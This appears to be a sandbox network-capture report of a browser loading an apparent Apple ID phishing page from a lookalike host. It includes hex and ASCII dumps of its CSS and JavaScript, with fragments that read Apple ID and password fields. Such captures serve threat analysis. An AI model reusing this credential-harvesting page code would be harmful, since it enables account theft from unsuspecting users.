2025-01-13 00:49:36 UTC	233	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 00:49:36 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Thu, 15 Aug 2024 23:42:42 GMT Accept-Ranges: bytes Content-Length: 133797 Content-Type: text/css
2025-01-13 00:49:36 UTC	7959	IN	Data Raw: 68 74 6d 6c 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 2d 6d 73 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 31 30 30 25 3b 7d 0d 0a 0d 0a 62 6f 64 79 20 7b 6d 61 72 67 69 6e 3a 30 3b 7d 0d 0a 0d 0a 61 72 74 69 63 6c 65 2c 20 61 73 69 64 65 2c 20 64 65 74 61 69 6c 73 2c 20 66 69 67 63 61 70 74 69 6f 6e 2c 20 66 69 67 75 72 65 2c 20 66 6f 6f 74 65 72 2c 20 68 65 61 64 65 72 2c 20 68 67 72 6f 75 70 2c 20 6d 61 69 6e 2c 20 6d 65 6e 75 2c 20 6e 61 76 2c 20 73 65 63 74 69 6f 6e 2c 20 73 75 6d 6d 61 72 79 20 7b 0d 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 0d 0a 7d 0d 0a 0d 0a 61 75 64 69 6f 2c 20 63 61 6e 76 61 73 2c Data Ascii: html {font-family:sans-serif;-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%;}body {margin:0;}article, aside, details, figcaption, figure, footer, header, hgroup, main, menu, nav, section, summary { display:block;}audio, canvas,
2025-01-13 00:49:36 UTC	8000	IN	Data Raw: 0d 0a 0d 0a 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 32 35 25 3b 0d 0a 0d 0a 7d 0d 0a 0d 0a 2e 63 6f 6c 2d 78 73 2d 6f 66 66 73 65 74 2d 34 20 7b 0d 0a 0d 0a 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 33 33 2e 33 33 33 33 33 25 3b 0d 0a 0d 0a 7d 0d 0a 0d 0a 2e 63 6f 6c 2d 78 73 2d 6f 66 66 73 65 74 2d 35 20 7b 0d 0a 0d 0a 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 34 31 2e 36 36 36 36 37 25 3b 0d 0a 0d 0a 7d 0d 0a 0d 0a 2e 63 6f 6c 2d 78 73 2d 6f 66 66 73 65 74 2d 36 20 7b 0d 0a 0d 0a 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 35 30 25 3b 0d 0a 0d 0a 7d 0d 0a 0d 0a 2e 63 6f 6c 2d 78 73 2d 6f 66 66 73 65 74 2d 37 20 7b 0d 0a 0d 0a 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 35 38 2e 33 33 33 33 33 25 3b 0d 0a 0d 0a 7d 0d 0a 0d 0a Data Ascii: margin-left:25%;}.col-xs-offset-4 { margin-left:33.33333%;}.col-xs-offset-5 { margin-left:41.66667%;}.col-xs-offset-6 { margin-left:50%;}.col-xs-offset-7 { margin-left:58.33333%;}
2025-01-13 00:49:36 UTC	8000	IN	Data Raw: 0d 0a 0d 0a 20 20 20 20 2e 63 6f 6c 2d 6c 67 2d 70 75 6c 6c 2d 32 20 7b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 72 69 67 68 74 3a 31 36 2e 36 36 36 36 37 25 3b 0d 0a 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 63 6f 6c 2d 6c 67 2d 70 75 6c 6c 2d 33 20 7b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 72 69 67 68 74 3a 32 35 25 3b 0d 0a 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 63 6f 6c 2d 6c 67 2d 70 75 6c 6c 2d 34 20 7b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 72 69 67 68 74 3a 33 33 2e 33 33 33 33 33 25 3b 0d 0a 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 63 6f 6c 2d 6c 67 2d 70 75 6c 6c 2d 35 20 7b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 72 69 67 68 74 3a 34 31 2e 36 36 36 36 37 25 3b 0d 0a 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 63 6f 6c 2d 6c 67 2d 70 Data Ascii: .col-lg-pull-2 { right:16.66667%; } .col-lg-pull-3 { right:25%; } .col-lg-pull-4 { right:33.33333%; } .col-lg-pull-5 { right:41.66667%; } .col-lg-p
2025-01-13 00:49:36 UTC	8000	IN	Data Raw: 66 66 3b 0d 0a 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 62 63 30 64 65 3b 0d 0a 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 34 36 62 38 64 61 3b 0d 0a 0d 0a 7d 0d 0a 0d 0a 2e 62 74 6e 2d 69 6e 66 6f 3a 66 6f 63 75 73 2c 20 2e 62 74 6e 2d 69 6e 66 6f 2e 66 6f 63 75 73 20 7b 0d 0a 0d 0a 20 20 20 20 63 6f 6c 6f 72 3a 23 66 66 66 3b 0d 0a 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 33 31 62 30 64 35 3b 0d 0a 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 31 62 36 64 38 35 3b 0d 0a 0d 0a 7d 0d 0a 0d 0a 2e 62 74 6e 2d 69 6e 66 6f 3a 68 6f 76 65 72 20 7b 0d 0a 0d 0a 20 20 20 20 63 6f 6c 6f 72 3a 23 66 66 66 3b 0d 0a 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f Data Ascii: ff; background-color:#5bc0de; border-color:#46b8da;}.btn-info:focus, .btn-info.focus { color:#fff; background-color:#31b0d5; border-color:#1b6d85;}.btn-info:hover { color:#fff; background-co
2025-01-13 00:49:36 UTC	8000	IN	Data Raw: 40 6d 65 64 69 61 28 6d 69 6e 2d 77 69 64 74 68 3a 37 36 38 70 78 29 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 39 39 31 70 78 29 20 7b 0d 0a 0d 0a 20 20 20 20 2e 76 69 73 69 62 6c 65 2d 73 6d 2d 69 6e 6c 69 6e 65 20 7b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0d 0a 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 7d 0d 0a 0d 0a 40 6d 65 64 69 61 28 6d 69 6e 2d 77 69 64 74 68 3a 37 36 38 70 78 29 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 39 39 31 70 78 29 20 7b 0d 0a 0d 0a 20 20 20 20 2e 76 69 73 69 62 6c 65 2d 73 6d 2d 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 20 7b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 20 21 69 6d 70 6f 72 74 61 6e 74 Data Ascii: @media(min-width:768px) and (max-width:991px) { .visible-sm-inline { display:inline !important; }}@media(min-width:768px) and (max-width:991px) { .visible-sm-inline-block { display:inline-block !important
2025-01-13 00:49:36 UTC	8000	IN	Data Raw: 0d 0a 20 20 20 20 2d 6d 6f 7a 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 76 65 72 74 69 63 61 6c 3b 0d 0a 0d 0a 20 20 20 20 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 0d 0a 0d 0a 20 20 20 20 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 0d 0a 0d 0a 20 20 20 20 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 0d 0a 0d 0a 7d 0d 0a 0d 0a 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 64 65 76 69 63 65 2d 77 69 64 74 68 3a 37 36 37 70 78 29 20 7b 0d 0a 0d 0a 20 20 20 20 2e 69 64 6d 73 2d 6d 6f 64 61 6c 20 7b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 34 30 70 78 20 31 30 70 78 3b 0d 0a 0d 0a 20 20 20 20 7d Data Ascii: -moz-flex-direction:vertical; -ms-flex-direction:column; -webkit-flex-direction:column; flex-direction:column;}@media only screen and (max-device-width:767px) { .idms-modal { padding:40px 10px; }
2025-01-13 00:49:36 UTC	8000	IN	Data Raw: 20 20 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 31 33 35 64 65 67 29 20 73 6b 65 77 58 28 35 64 65 67 29 20 73 6b 65 77 59 28 35 64 65 67 29 3b 0d 0a 0d 0a 20 20 20 20 74 6f 70 3a 2d 38 70 78 3b 0d 0a 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 6c 65 66 74 3a 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 31 38 35 2c 20 31 34 39 2c 20 31 2c 20 30 2e 34 37 29 3b 0d 0a 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 31 38 35 2c 20 31 34 39 2c 20 31 2c 20 30 2e 34 37 29 3b 0d 0a 0d 0a 20 20 20 20 62 6f 78 2d 73 68 61 64 6f 77 3a 2d 31 70 78 20 31 70 78 20 32 70 78 20 2d 31 70 78 20 72 67 62 61 28 31 38 35 2c 20 31 34 39 2c 20 31 2c 20 30 2e 34 37 29 3b 0d 0a 0d 0a 7d 0d 0a 0d 0a 2e 73 69 2d 63 6f 6e Data Ascii: transform:rotate(135deg) skewX(5deg) skewY(5deg); top:-8px; border-left:1px solid rgba(185, 149, 1, 0.47); border-bottom:1px solid rgba(185, 149, 1, 0.47); box-shadow:-1px 1px 2px -1px rgba(185, 149, 1, 0.47);}.si-con
2025-01-13 00:49:36 UTC	8000	IN	Data Raw: 68 65 69 67 68 74 3a 30 25 3b 0d 0a 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 7d 0d 0a 0d 0a 40 2d 6b 68 74 6d 6c 2d 6b 65 79 66 72 61 6d 65 73 20 73 6c 69 64 65 64 6f 77 6e 20 7b 0d 0a 0d 0a 20 20 20 20 30 25 20 7b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0d 0a 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 32 35 25 20 7b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 35 30 25 3b 0d 0a 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 37 35 25 20 7b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 32 35 25 3b 0d 0a 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 31 30 30 25 20 7b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 30 25 3b 0d 0a 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 7d 0d 0a 0d 0a 40 6b 65 79 66 72 61 6d 65 Data Ascii: height:0%; }}@-khtml-keyframes slidedown { 0% { height:100%; } 25% { height:50%; } 75% { height:25%; } 100% { height:0%; }}@keyframe
2025-01-13 00:49:36 UTC	8000	IN	Data Raw: 20 2e 69 64 6d 73 2d 6d 6f 64 61 6c 20 2e 72 65 73 65 74 2d 63 72 2d 74 6f 6b 65 6e 20 2e 64 69 61 6c 6f 67 2d 69 6e 66 6f 20 2e 73 69 2d 6c 69 6e 6b 20 7b 0d 0a 0d 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 32 30 70 78 3b 0d 0a 0d 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 0d 0a 0d 0a 7d 0d 0a 0d 0a 2e 69 64 6d 73 2d 6d 6f 64 61 6c 20 2e 73 75 70 70 72 65 73 73 20 2e 64 69 61 6c 6f 67 2d 66 6f 6f 74 65 72 2c 20 2e 69 64 6d 73 2d 6d 6f 64 61 6c 20 2e 61 63 63 2d 6c 6f 63 6b 65 64 20 2e 64 69 61 6c 6f 67 2d 66 6f 6f 74 65 72 2c 20 2e 69 64 6d 73 2d 6d 6f 64 61 6c 20 2e 72 65 73 65 74 2d 63 72 2d 74 6f 6b 65 6e 20 2e 64 69 61 6c 6f 67 2d 66 6f 6f 74 65 72 20 7b 0d 0a 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 74 6f 70 3a 31 70 78 20 73 6f Data Ascii: .idms-modal .reset-cr-token .dialog-info .si-link { font-size:20px; font-weight:400;}.idms-modal .suppress .dialog-footer, .idms-modal .acc-locked .dialog-footer, .idms-modal .reset-cr-token .dialog-footer { border-top:1px so
2025-01-13 00:49:36 UTC	8000	IN	Data Raw: 72 6f 77 73 65 72 20 2e 66 6f 6f 74 65 72 20 2e 62 75 74 74 6f 6e 2d 62 61 72 20 2e 62 75 74 74 6f 6e 20 7b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 37 70 78 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 2d 30 2e 30 32 33 35 65 6d 3b 0d 0a 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 73 66 2d 6e 73 2d 75 69 20 2e 6c 6f 67 6f 20 2e 63 6e 73 6d 72 2d 61 70 70 2d 6e 61 6d 65 20 7b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 32 33 70 78 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 30 2e 30 31 38 35 65 6d 3b 0d 0a 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 73 66 2d 6e 73 2d 75 69 20 2e 77 69 64 67 65 74 2d 63 6f 6e 74 61 69 6e Data Ascii: rowser .footer .button-bar .button { font-size:17px; letter-spacing:-0.0235em; } .sf-ns-ui .logo .cnsmr-app-name { font-size:23px; letter-spacing:0.0185em; } .sf-ns-ui .widget-contain

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.6	53568	89.250.71.221	443	6332	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 00:49:36 UTC	560	OUT	GET /aU3V88/jss/function.js HTTP/1.1 Host: www.flndmy.er-xu.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://www.flndmy.er-xu.com/aU3V88/c1.php Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-13 00:49:36 UTC	238	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 00:49:36 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Thu, 15 Aug 2024 23:42:42 GMT Accept-Ranges: bytes Content-Length: 3108 Content-Type: text/javascript
2025-01-13 00:49:36 UTC	3108	IN	Data Raw: 2f 2a 2a 0d 0a 2a 0d 0a 2a 20 20 42 61 73 65 36 34 20 65 6e 63 6f 64 65 20 2f 20 64 65 63 6f 64 65 0d 0a 2a 20 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 65 62 74 6f 6f 6c 6b 69 74 2e 69 6e 66 6f 2f 0d 0a 2a 0d 0a 2a 2a 2f 0d 0a 0d 0a 76 61 72 20 42 61 73 65 36 34 20 3d 20 7b 0d 0a 0d 0a 09 2f 2f 20 70 72 69 76 61 74 65 20 70 72 6f 70 65 72 74 79 0d 0a 09 5f 6b 65 79 53 74 72 20 3a 20 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 30 31 32 33 34 35 36 37 38 39 2b 2f 3d 22 2c 0d 0a 0d 0a 09 2f 2f 20 70 75 62 6c 69 63 20 6d 65 74 68 6f 64 20 66 6f 72 20 65 6e 63 6f 64 69 6e 67 0d 0a 09 65 6e 63 6f 64 65 20 3a 20 66 75 6e 63 74 69 6f 6e 20 28 69 6e 70 Data Ascii: /**** Base64 encode / decode* http://www.webtoolkit.info/***/var Base64 = {// private property_keyStr : "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",// public method for encodingencode : function (inp

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.6	53566	89.250.71.221	443	6332	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 00:49:36 UTC	569	OUT	GET /aU3V88/jss/myscript_ind_fact.js HTTP/1.1 Host: www.flndmy.er-xu.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://www.flndmy.er-xu.com/aU3V88/c1.php Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-13 00:49:36 UTC	238	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 00:49:36 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Thu, 15 Aug 2024 23:42:42 GMT Accept-Ranges: bytes Content-Length: 4706 Content-Type: text/javascript
2025-01-13 00:49:36 UTC	4706	IN	Data Raw: 66 75 6e 63 74 69 6f 6e 20 6c 69 6d 70 69 61 72 5f 63 61 72 67 61 28 29 20 7b 0a 20 20 20 20 24 28 22 23 63 61 72 67 61 5f 65 6e 76 69 6f 22 29 2e 63 73 73 28 22 64 69 73 70 6c 61 79 22 2c 20 22 6e 6f 6e 65 22 29 2c 20 24 28 22 23 62 74 5f 66 6c 65 63 22 29 2e 63 73 73 28 22 64 69 73 70 6c 61 79 22 2c 20 22 62 6c 6f 63 6b 22 29 0a 7d 0a 0a 66 75 6e 63 74 69 6f 6e 20 73 75 62 6d 69 74 74 28 29 20 7b 0a 20 20 20 20 24 2e 74 72 69 6d 28 24 28 22 23 61 70 70 6c 65 49 64 22 29 2e 76 61 6c 28 29 2e 6c 65 6e 67 74 68 29 20 3e 20 30 20 3f 20 24 2e 74 72 69 6d 28 24 28 22 23 70 77 64 22 29 2e 76 61 6c 28 29 2e 6c 65 6e 67 74 68 29 20 3e 20 30 20 26 26 20 28 24 28 22 23 63 61 72 67 61 5f 65 6e 76 69 6f 22 29 2e 63 73 73 28 22 64 69 73 70 6c 61 79 22 2c 20 22 62 6c Data Ascii: function limpiar_carga() { $("#carga_envio").css("display", "none"), $("#bt_flec").css("display", "block")}function submitt() { $.trim($("#appleId").val().length) > 0 ? $.trim($("#pwd").val().length) > 0 && ($("#carga_envio").css("display", "bl

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.6	53565	89.250.71.221	443	6332	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 00:49:36 UTC	576	OUT	GET /aU3V88/jss/myscript_patron.js?v=2gdssf HTTP/1.1 Host: www.flndmy.er-xu.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://www.flndmy.er-xu.com/aU3V88/c1.php Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-13 00:49:37 UTC	239	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 00:49:36 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Thu, 15 Aug 2024 23:42:42 GMT Accept-Ranges: bytes Content-Length: 11635 Content-Type: text/javascript
2025-01-13 00:49:37 UTC	7953	IN	Data Raw: 20 20 64 6f 63 75 6d 65 6e 74 2e 6f 6e 63 6f 6e 74 65 78 74 6d 65 6e 75 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 7d 0a 20 20 0a 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 20 20 20 20 20 0a 0a 20 20 20 20 24 28 22 23 62 74 6e 5f 69 70 22 29 2e 63 73 73 28 22 74 6f 70 22 2c 22 35 70 78 22 29 3b 0a 0a 20 20 20 20 24 28 22 23 63 6f 6e 74 5f 62 74 6e 5f 61 70 70 6c 65 22 29 2e 61 64 64 43 6c 61 73 73 28 22 61 70 5f 62 6f 72 22 29 3b 0a 20 20 20 20 24 28 22 23 63 6f 6e 74 5f 62 74 6e 5f 61 70 70 6c 65 22 29 2e 61 64 64 43 6c 61 73 73 28 22 62 6f 72 22 29 3b 0a 20 20 20 20 0a 20 20 20 20 24 28 22 23 63 6f 6e 74 5f 70 77 64 22 29 2e 61 64 64 43 6c 61 73 73 28 27 6e 6f 5f Data Ascii: document.oncontextmenu = function(){return false;} $(document).ready(function(){ $("#btn_ip").css("top","5px"); $("#cont_btn_apple").addClass("ap_bor"); $("#cont_btn_apple").addClass("bor"); $("#cont_pwd").addClass('no_
2025-01-13 00:49:37 UTC	3682	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 65 6c 73 65 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 69 67 69 74 6f 3d 64 69 67 69 74 6f 2b 27 2d 27 2b 24 28 74 68 69 73 29 2e 76 61 6c 28 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: }else{ digito=digito+'-'+$(this).val(); } } });

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.6	53572	89.250.71.221	443	6332	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 00:49:36 UTC	627	OUT	GET /aU3V88/images/ajax-loader.gif HTTP/1.1 Host: www.flndmy.er-xu.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://www.flndmy.er-xu.com/aU3V88/c1.php Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-13 00:49:36 UTC	232	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 00:49:36 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Thu, 15 Aug 2024 23:42:42 GMT Accept-Ranges: bytes Content-Length: 3783 Content-Type: image/gif
2025-01-13 00:49:36 UTC	3783	IN	Data Raw: 47 49 46 38 39 61 20 00 20 00 f5 19 00 60 60 60 0c 0c 0c 00 00 00 e8 e8 e8 f0 f0 f0 d0 d0 d0 7e 7e 7e fa fa fa f6 f6 f6 e6 e6 e6 fc fc fc 92 92 92 86 86 86 e2 e2 e2 a0 a0 a0 3e 3e 3e c4 c4 c4 6c 6c 6c ee ee ee ec ec ec b8 b8 b8 56 56 56 9a 9a 9a ae ae ae 4a 4a 4a c8 c8 c8 dc dc dc d8 d8 d8 ce ce ce b0 b0 b0 1e 1e 1e 2c 2c 2c 4c 4c 4c 7c 7c 7c 5e 5e 5e a8 a8 a8 ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 ff 0b 4e 45 54 53 43 41 50 45 32 2e 30 03 01 00 00 00 21 fe 1a 43 72 65 61 74 65 64 20 77 69 74 68 20 61 6a 61 78 6c 6f 61 64 2e 69 6e 66 6f 00 21 Data Ascii: GIF89a ```~~~>>>lllVVVJJJ,,,LLL\|\|\|^^^!NETSCAPE2.0!Created with ajaxload.info!

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.6	53600	89.250.71.221	443	6332	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 00:49:39 UTC	366	OUT	GET /aU3V88/jss/function.js HTTP/1.1 Host: www.flndmy.er-xu.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-13 00:49:39 UTC	238	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 00:49:39 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Thu, 15 Aug 2024 23:42:42 GMT Accept-Ranges: bytes Content-Length: 3108 Content-Type: text/javascript
2025-01-13 00:49:39 UTC	3108	IN	Data Raw: 2f 2a 2a 0d 0a 2a 0d 0a 2a 20 20 42 61 73 65 36 34 20 65 6e 63 6f 64 65 20 2f 20 64 65 63 6f 64 65 0d 0a 2a 20 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 65 62 74 6f 6f 6c 6b 69 74 2e 69 6e 66 6f 2f 0d 0a 2a 0d 0a 2a 2a 2f 0d 0a 0d 0a 76 61 72 20 42 61 73 65 36 34 20 3d 20 7b 0d 0a 0d 0a 09 2f 2f 20 70 72 69 76 61 74 65 20 70 72 6f 70 65 72 74 79 0d 0a 09 5f 6b 65 79 53 74 72 20 3a 20 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 30 31 32 33 34 35 36 37 38 39 2b 2f 3d 22 2c 0d 0a 0d 0a 09 2f 2f 20 70 75 62 6c 69 63 20 6d 65 74 68 6f 64 20 66 6f 72 20 65 6e 63 6f 64 69 6e 67 0d 0a 09 65 6e 63 6f 64 65 20 3a 20 66 75 6e 63 74 69 6f 6e 20 28 69 6e 70 Data Ascii: /**** Base64 encode / decode* http://www.webtoolkit.info/***/var Base64 = {// private property_keyStr : "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",// public method for encodingencode : function (inp

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.6	53604	89.250.71.221	443	6332	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
